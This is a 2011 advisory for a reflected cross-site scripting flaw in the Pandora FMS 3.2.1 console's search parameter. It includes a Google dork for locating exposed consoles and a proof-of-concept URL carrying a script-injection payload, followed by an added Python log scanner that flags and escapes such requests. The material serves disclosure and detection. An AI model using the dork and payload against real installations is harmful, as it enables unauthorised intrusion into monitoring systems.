# Exploit Title: Pandora FMS v3.2.1 Cross Site Scripting
# Google Dork: intitle:"Pandora FMS - the Flexible Monitoring System" intext:"Your IP"
# Date: 8-08-2011
# Author: Mehdi Boukazoula
# Software Link: http://pandorafms.org/
# Version: v 3.2.1
# Tested on: v =< 3.2.1
# Description :

affected parameter : search
page : index.php

PoC :
http://localhost/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
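
Added example, not part of the original advisory: a Python check that scans web access logs for requests to the console's index.php whose decoded `search` parameter contains the HTML metacharacters the PoC relies on. The log lines are constructed samples, and the `/pandora_console/index.php` path is taken from the PoC's localhost URL and assumed to match the deployment.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the console is installed under the path used in the PoC URL.
CONSOLE_PATH = "/pandora_console/index.php"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters needed to close an attribute value and open a new tag.
HTML_META = re.compile(r'[<>"]')

# Constructed sample lines (documentation IP range), not from a real system.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2011:10:00:01 +0000] "GET /pandora_console/index.php'
    '?sec=estado&sec2=operation/agentes/estado_agente&search=webserver HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Aug/2011:10:02:17 +0000] "GET /pandora_console/index.php'
    '?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0'
    '&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E HTTP/1.1" 200 5342',
    '192.0.2.10 - - [08/Aug/2011:10:03:40 +0000] "GET /pandora_console/index.php'
    '?sec=estado&search=db+O%27Brien HTTP/1.1" 200 5090',
    '192.0.2.51 - - [08/Aug/2011:10:05:02 +0000] "GET /blog/index.php'
    '?search=%3Cb%3E HTTP/1.1" 200 800',
]


def suspicious_search_values(log_lines, console_path=CONSOLE_PATH):
    """Return (client_ip, decoded_value, html_escaped_value) per flagged request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != console_path:
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared
        # in the same form the application sees them.
        for value in parse_qs(url.query, keep_blank_values=True).get("search", []):
            if HTML_META.search(value):
                # html.escape(quote=True) is the encoding that keeps the value
                # inert in HTML text and attribute contexts; use it when the
                # hit is shown in an HTML report.
                hits.append((line.split()[0], value, html.escape(value, quote=True)))
    return hits


if __name__ == "__main__":
    for ip, raw, safe in suspicious_search_values(SAMPLE_LOG):
        print(f"{ip} search={raw!r} escaped={safe}")
```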